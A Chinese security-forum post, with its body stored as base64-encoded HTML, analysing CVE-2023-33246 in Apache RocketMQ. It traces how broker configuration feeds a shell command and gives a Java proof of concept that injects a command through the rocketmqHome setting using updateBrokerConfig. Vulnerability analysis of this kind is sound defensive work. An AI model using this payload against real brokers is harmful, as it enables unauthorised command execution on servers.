CVE-2023-33246 RocketMQ 远程代码执行漏洞
PGgxIGlkPSJoMS0tIj48YSBuYW1lPSLkuIDjgIHmvI/mtJ7mj4/ov7AiIGNsYXNzPSJyZWZlcmVuY2UtbGluayI+PC9hPjxzcGFuIGNsYXNzPSJoZWFkZXItbGluayBvY3RpY29uIG9jdGljb24tbGluayI+PC9zcGFuPuS4gOOAgea8j+a0nuaPj+i/sDwvaDE+PHA+Um9ja2V0TVEgNS4xLjDlj4rku6XkuIvniYjmnKzvvIzlnKjkuIDlrprmnaHku7bkuIvvvIzlrZjlnKjov5znqIvlkb3ku6TmiafooYzpo47pmanjgIJSb2NrZXRNUeeahE5hbWVTZXJ2ZXLjgIFCcm9rZXLjgIFDb250cm9sbGVy562J5aSa5Liq57uE5Lu25aSW572R5rOE6Zyy77yM57y65LmP5p2D6ZmQ6aqM6K+B77yM5pS75Ye76ICF5Y+v5Lul5Yip55So6K+l5ryP5rSe5Yip55So5pu05paw6YWN572u5Yqf6IO95LulUm9ja2V0TVHov5DooYznmoTns7vnu5/nlKjmiLfouqvku73miafooYzlkb3ku6TjgIIg5q2k5aSW77yM5pS75Ye76ICF5Y+v5Lul6YCa6L+H5Lyq6YCgIFJvY2tldE1RIOWNj+iuruWGheWuueadpei+vuWIsOWQjOagt+eahOaViOaenOOAgjwvcD4KPGgxIGlkPSJoMS0tIj48YSBuYW1lPSLkuozjgIHlvbHlk43niYjmnKwiIGNsYXNzPSJyZWZlcmVuY2UtbGluayI+PC9hPjxzcGFuIGNsYXNzPSJoZWFkZXItbGluayBvY3RpY29uIG9jdGljb24tbGluayI+PC9zcGFuPuS6jOOAgeW9seWTjeeJiOacrDwvaDE+PHA+QXBhY2hlIFJvY2tldE1RICZsdDs9IDUuMS4xIEFwYWNoZSBSb2NrZXRNUSAmbHQ7PSA0LjkuNjwvcD4KPHByZT48Y29kZT50aGlzLmJyb2tlckNvbmZpZy5pc0VuYWJsZVNsYXZlQWN0aW5nTWFzdGVyKCkgfHwgdGhpcy5icm9rZXJDb25maWcuaXNFbmFibGVDb250cm9sbGVyTW9kZSgpKSB7CiAgICAgICAgaXNJc29sYXRlZCA9IHRydWU7CiAgICB9CiAgICBpZiAodGhpcy5icm9rZXJPdXRlckFQSSAhPSBudWxsKSB7CiAgICAgICAgdGhpcy5icm9rZXJPdXRlckFQSS5zdGFydCgpOwogICAgfQogICAgLy/osIPnlKjoh7NzdGFydEJhc2ljU2VydmljZSgpCiAgICBzdGFydEJhc2ljU2VydmljZSgpOwoKICAgIGlmICghaXNJc29sYXRlZCAmYW1wOyZhbXA7ICF0aGlzLm1lc3NhZ2VTdG9yZUNvbmZpZy5pc0VuYWJsZURMZWdlckNvbW1pdExvZygpICZhbXA7JmFtcDsgIXRoaXMubWVzc2FnZVN0b3JlQ29uZmlnLmlzRHVwbGljYXRpb25FbmFibGUoKSkgewogICAgICAgIGNoYW5nZVNwZWNpYWxTZXJ2aWNlU3RhdHVzKHRoaXMuYnJva2VyQ29uZmlnLmdldEJyb2tlcklkKCkgPT0gTWl4QWxsLk1BU1RFUl9JRCk7CiAgICAgICAgdGhpcy5yZWdpc3RlckJyb2tlckFsbCh0cnVlLCBmYWxzZSwgdHJ1ZSk7CiAgICB9CiAgICAuLi4uCjwvY29kZT48L3ByZT48cD5Ccm9rZXJDb250cm9sbGVyI3N0YXJ0QmFzaWNTZXJ2aWNlKCk8L3A+CjxwcmU+PGNvZGUgY2xhc3M9ImxhbmctamF2YSI+cHJvdGVjdGVkIHZvaWQgc3RhcnRCYXNpY1NlcnZpY2UoKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgIC4uLgogICAgaWYgKHRoaXMuZmlsdGVyU2VydmVyTWFuYWdlciAhPSBudWxsKSB7CiAgICAgICAgLy/osIPnlKjoh7NGaWx0ZXJTZXJ2ZXJNYW5hZ2VyI3N0YXJ0KCkKICAgICAgICB0aGlzLmZpbHRlclNlcnZlck1hbmFnZXIuc3RhcnQoKTsKICAgIH0KICAgIGlmICh0aGlzLmJyb2tlclN0YXRzTWFuYWdlciAhPSBudWxsKSB7CiAgICAgICAgdGhpcy5icm9rZXJTdGF0c01hbmFnZXIuc3RhcnQoKTsKICAgIH0KICAgIC4uLi4KPC9jb2RlPjwvcHJlPgo8cD5GaWx0ZXJTZXJ2ZXJNYW5hZ2VyI3N0YXJ0KCk8L3A+CjxwcmU+PGNvZGUgY2xhc3M9ImxhbmctamF2YSI+cHVibGljIHZvaWQgc3RhcnQoKSB7CiAgICAvL+WumuaXtuWRqOacn+aJp+ihjOaMh+WumuS7u+WKoQogICAgLy/ku7vliqHvvJpGaWx0ZXJTZXJ2ZXJNYW5hZ2VyLnRoaXMuY3JlYXRlRmlsdGVyU2VydmVyKCk7CiAgICAvL+WIneWni+WMluW7tuaXtjoxMDAwICogNQogICAgLy/kuKTmrKHlvIDlp4vmiafooYzmnIDlsI/pl7TpmpTml7bpl7Q6MTAwMCAqIDMwCiAgICAvL+iuoeaXtuWNleS9je+8mlRpbWVVbml0Lk1JTExJU0VDT05EUyDmr6vnp5IKICAgIHRoaXMuc2NoZWR1bGVkRXhlY3V0b3JTZXJ2aWNlLnNjaGVkdWxlQXRGaXhlZFJhdGUobmV3IEFic3RyYWN0QnJva2VyUnVubmFibGUoYnJva2VyQ29udHJvbGxlci5nZXRCcm9rZXJDb25maWcoKSkgewogICAgICAgICZsdDtzcGFuIGNsYXNzPSZxdW90O2xhYmVsIGxhYmVsLXByaW1hcnkmcXVvdDsmZ3Q7QE92ZXJyaWRlI0NUTHtufSZsdDsvc3BhbiZndDsgICAgICAgIHB1YmxpYyB2b2lkIHJ1bjAoKSB7CiAgICAgICAgICAgIHRyeSB7CiAgICAgICAgICAgICAgICBGaWx0ZXJTZXJ2ZXJNYW5hZ2VyLnRoaXMuY3JlYXRlRmlsdGVyU2VydmVyKCk7CiAgICAgICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgICAgICBsb2cuZXJyb3IoJnF1b3Q7JnF1b3Q7LCBlKTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0sIDEwMDAgKiA1LCAxMDAwICogMzAsIFRpbWVVbml0Lk1JTExJU0VDT05EUyk7Cn0KcHVibGljIHZvaWQgY3JlYXRlRmlsdGVyU2VydmVyKCkgewogICAgLy9maWx0ZXJTZXJ2ZXJOdW1z6buY6K6k5Li6MAogICAgLy9maWx0ZXJTZXJ2ZXJUYWJsZS5zaXplKCkg6buY6K6k5Li6MAogICAgLy9tb3JlIOm7mOiupOS4ujAKICAgIGludCBtb3JlID0KICAgICAgICB0aGlzLmJyb2tlckNvbnRyb2xsZXIuZ2V0QnJva2VyQ29uZmlnKCkuZ2V0RmlsdGVyU2VydmVyTnVtcygpIC0gdGhpcy5maWx0ZXJTZXJ2ZXJUYWJsZS5zaXplKCk7CiAgICAvL+iOt+WPlmNtZCzmraTlpIRjbWQg6YOo5YiG5Y+v5o6nCiAgICBTdHJpbmcgY21kID0gdGhpcy5idWlsZFN0YXJ0Q29tbWFuZCgpOwogICAgLy9tb3JlIOm7mOiupOS4ujDkuI3ov5vlhaXlvqrnjq/vvIzoi6XopoHmiafooYxjbWQgIOWImW1vcmUg5LiN5Li6MO+8jOWNs+mAmui/h+mFjee9ruS/ruaUueS9v2ZpbHRlclNlcnZlck51bXPkuI3kuLowCiAgICBmb3IgKGludCBpID0gMDsgaSAgT0smcXVvdDssIHNoZWxsU3RyaW5nKTsKICAgICAgICB9IGNhdGNoIChUaHJvd2FibGUgZSkgewogICAgICAgICAgICBsb2cuZXJyb3IoJnF1b3Q7Q2FsbFNoZWxsOiByZWFkTGluZSBJT0V4Y2VwdGlvbiwge30mcXVvdDssIHNoZWxsU3RyaW5nLCBlKTsKICAgICAgICB9IGZpbmFsbHkgewogICAgICAgICAgICBpZiAobnVsbCAhPSBwcm9jZXNzKQogICAgICAgICAgICAgICAgcHJvY2Vzcy5kZXN0cm95KCk7CiAgICAgICAgfQogICAgfQogICAgcHJpdmF0ZSBzdGF0aWMgU3RyaW5nW10gc3BsaXRTaGVsbFN0cmluZyhmaW5hbCBTdHJpbmcgc2hlbGxTdHJpbmcpIHsKICAgICAgICByZXR1cm4gc2hlbGxTdHJpbmcuc3BsaXQoJnF1b3Q7ICZxdW90Oyk7CiAgICB9Cn0KPC9jb2RlPjwvcHJlPgo8aDIgaWQ9ImgyLTItIj48YSBuYW1lPSIy44CB5ryP5rSe5Yip55SoIiBjbGFzcz0icmVmZXJlbmNlLWxpbmsiPjwvYT48c3BhbiBjbGFzcz0iaGVhZGVyLWxpbmsgb2N0aWNvbiBvY3RpY29uLWxpbmsiPjwvc3Bhbj4y44CB5ryP5rSe5Yip55SoPC9oMj48cD7nu7zkuIrvvJo8YnI+MeOAgeezu+e7n+m7mOiupDMw56eS5omn6KGM5LiA5qyhIDxjb2RlPkZpbHRlclNlcnZlck1hbmFnZXIjY3JlYXRlRmlsdGVyU2VydmVyKCk8L2NvZGU+PGJyPjLjgIE8Y29kZT5GaWx0ZXJTZXJ2ZXJNYW5hZ2VyI2NyZWF0ZUZpbHRlclNlcnZlcigpPC9jb2RlPuS4reWtmOWcqOWRveS7pOaJp+ihjOihjOS4ujxicj4z44CB5Y+v6YCa6L+H5pyq5o6I5p2D5L+u5pS56YWN572u5o6n5Yi26KaB5omn6KGM55qE5ZG95LukLOWIhuS4uuS7peS4i+S4pOenjeaDheWGtTo8YnI+d2luZG93c++8mjxjb2RlPnN0YXJ0IC9iICR7MX1cXGJpblxcbXFmaWx0ZXJzcnYuZXhlIC1jICR7Mn0gLW4gJHszfTwvY29kZT48YnI+6Z2ed2luZG93czo8Y29kZT5zaCAkezF9L2Jpbi9zdGFydGZzcnYuc2ggLWMgJHsyfSAtbiAkezN9PC9jb2RlPjxicj4x44CBMuOAgTPkuInlh7rlnYflj6/pgJrov4fphY3nva7mlofku7bmjqfliLbjgII8L3A+CjxoMyBpZD0iaDMtcGF5bG9hZCI+PGEgbmFtZT0icGF5bG9hZCIgY2xhc3M9InJlZmVyZW5jZS1saW5rIj48L2E+PHNwYW4gY2xhc3M9ImhlYWRlci1saW5rIG9jdGljb24gb2N0aWNvbi1saW5rIj48L3NwYW4+cGF5bG9hZDwvaDM+PHByZT48Y29kZSBjbGFzcz0ibGFuZy1qYXZhIj5pbXBvcnQgamF2YS51dGlsLlByb3BlcnRpZXM7CmltcG9ydCBvcmcuYXBhY2hlLnJvY2tldG1xLnRvb2xzLmFkbWluLkRlZmF1bHRNUUFkbWluRXh0OwoKcHVibGljIHN0YXRpYyB2b2lkIG1haW4oU3RyaW5nW10gYXJncykgewogICAgICAgIC8vIOWIm+W7uiBQcm9wZXJ0aWVzIOWvueixoQogICAgICAgIFByb3BlcnRpZXMgcHJvcHMgPSBuZXcgUHJvcGVydGllcygpOwogICAgICAgIC8v5L+u5pS5cm9ja2V0bXFIb21l6YWN572uCiAgICAgICAgcHJvcHMuc2V0UHJvcGVydHkoJnF1b3Q7cm9ja2V0bXFIb21lJnF1b3Q7LCZxdW90Oy1jICRAfHNoIC4gZWNobyBvcGVuIC1hIENhbGN1bGF0b3I7JnF1b3Q7KTsKICAgICAgICBwcm9wcy5zZXRQcm9wZXJ0eSgmcXVvdDtmaWx0ZXJTZXJ2ZXJOdW1zJnF1b3Q7LCZxdW90OzEmcXVvdDspOwogICAgICAgIC8vIOWIm+W7uiBEZWZhdWx0TVFBZG1pbkV4dCDlr7nosaHlubblkK/liqgKICAgICAgICBEZWZhdWx0TVFBZG1pbkV4dCBhZG1pbiA9IG5ldyBEZWZhdWx0TVFBZG1pbkV4dCgpOwogICAgICAgIC8v5q2k5aSE5Li6IG5hbWVzcnYg56uv5Y+jLOatpOerr+WPo+aXoOmcgOWPr+iuv+mXrgogICAgICAgIGFkbWluLnNldE5hbWVzcnZBZGRyKCZxdW90O2xvY2FsaG9zdDo5ODc2JnF1b3Q7KTsKICAgICAgICBhZG1pbi5zdGFydCgpOwogICAgICAgIC8vIOabtOaWsOmFjee9ruK9guS7tgogICAgICAgIC8v5q2k5aSE5Li6IGJyb2tlciDnq6/lj6PvvIzlv4Xpobvlj6/orr/pl64KICAgICAgICBhZG1pbi51cGRhdGVCcm9rZXJDb25maWcoJnF1b3Q7MTI3LjAuMC4xOjEwOTExJnF1b3Q7LCBwcm9wcyk7CiAgICAgICAgLy8g5YWz6ZetIERlZmF1bHRNUUFkbWluRXh0IOWvueixoQogICAgICAgIGFkbWluLnNodXRkb3duKCk7Cn0KPC9jb2RlPjwvcHJlPg==
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| Track-魔方 | 300.00 | 0 | 2023-06-05 11:11:49 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
0 条回复
|
直到 2023-6-2 |
847 次浏览
登录后才可发表内容
返回:技术文章投稿区
漏洞文章
